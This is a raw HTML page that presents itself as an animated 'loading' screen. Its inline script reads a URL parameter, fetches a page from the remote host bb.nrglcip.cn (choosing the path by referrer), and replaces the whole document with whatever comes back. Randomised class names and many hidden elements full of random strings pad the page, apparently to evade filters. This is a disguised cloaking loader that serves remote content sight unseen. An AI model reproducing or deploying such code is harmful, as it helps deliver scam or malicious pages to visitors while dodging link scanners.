<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SGZjeW8Bk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SGZjeW8Bk .XxUSBPlZ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SGZjeW8Bk .content {
            line-height: 50px;
            text-align: center
        }

        .SGZjeW8Bk .img {
            width: 100%
        }

        .SGZjeW8Bk .oJMucdDZto {
            text-align: center
        }

        .SGZjeW8Bk .oJMucdDZto span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SGZjeW8Bk .oJMucdDZto span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SGZjeW8Bk .oJMucdDZto span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SGZjeW8Bk .oJMucdDZto span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SGZjeW8Bk .oJMucdDZto span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SGZjeW8Bk .oJMucdDZto span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SGZjeW8Bk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DKkwkWUoy(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wAvEL = DKkwkWUoy('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wAvEL +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wAvEL +".html?a=share";
		}
		
        nAzStg=url+"#"+new Date().getTime();
        nAzStg && function() {
            $.get(nAzStg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>YdQZiEr1juP99zfkzHl9ZUG4Eqc2Btb81LehxJ0GOuhK</p><div class="SGZjeW8Bk">
    <div class="XxUSBPlZ">
        <div class="oJMucdDZto">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>esgLdLcMdFoRnjxFR3fcTVqNGl4ltOF6eHzwOBSmQXoeOAsDKQSgk4N0OVYR72ZHS3mPgeRqd8b4roNeIHsNgcvSNXVQnKjWZ</span>
<div style='display:none'>Ur0eR5K8HL76GFJYj54GF80nBLzKh2sMECqohQ1cRiSeVkG</div>
<li style='display:none' >eeV1NCD3JDXCcfSRNf1U6oHhWvJCvOwO0RNDFf2iQ9qdYq</li>
<h1 style='display:none' >BMhclR8eIj4UvPV0qO4XH4uGWmfKxzYfzDLMOhleRZOBPUXuhDbw1D</h1>
<li style='display:none' >eeV1NCD3JDXCcfSRNf1U6oHhWvJCvOwO0RNDFf2iQ9qdYq</li>
<span style='display:none'>esgLdLcMdFoRnjxFR3fcTVqNGl4ltOF6eHzwOBSmQXoeOAsDKQSgk4N0OVYR72ZHS3mPgeRqd8b4roNeIHsNgcvSNXVQnKjWZ</span>
<ul style='display:none' >cwxfv6qwVZJ7t0sJQBXBggdLxQlzccOZZbvnVq2hCPO5vLr</ul>
<p  style='display:none'>nExPkENeazIuBfpey3wbAjets86BSnjEPGVueA0zjkry8</p>
<ul style='display:none' >cwxfv6qwVZJ7t0sJQBXBggdLxQlzccOZZbvnVq2hCPO5vLr</ul>
<div style='display:none'>Ur0eR5K8HL76GFJYj54GF80nBLzKh2sMECqohQ1cRiSeVkG</div></body>
</html>